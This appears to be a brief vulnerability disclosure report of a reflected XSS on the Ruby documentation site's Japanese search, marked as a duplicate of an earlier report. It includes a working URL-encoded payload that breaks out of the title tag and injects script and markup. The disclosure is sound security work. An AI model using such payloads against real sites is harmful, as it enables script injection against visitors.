XSS

Hello,

Reflected Xss Found. ..

Steps;

I scanned the subdomain and did some research on "query".

I targeted Callbacks and achieved this goal;

https://docs.ruby-lang.org/ja/search/query:import/query:callback

then with the necessary tests

https://docs.ruby-lang.org/ja/search/query:import/query:callback/%22%3E%3C/title%3Ealert(XSS%20A%C3%A7%C4%B1%C4%9F%C4%B1)%3C/script%3E%3E%3Cmarquee%3E%3Ch1%3EXSSa%C3%A7%C4%B1%C4%9F%C4%B1%3C/h1%3E%3C/marquee%3E%3D

I reach the conclusion ...

SS :

search:
import "wanted" + payload = reflected ...

[hsbt]

Duplicates of #1734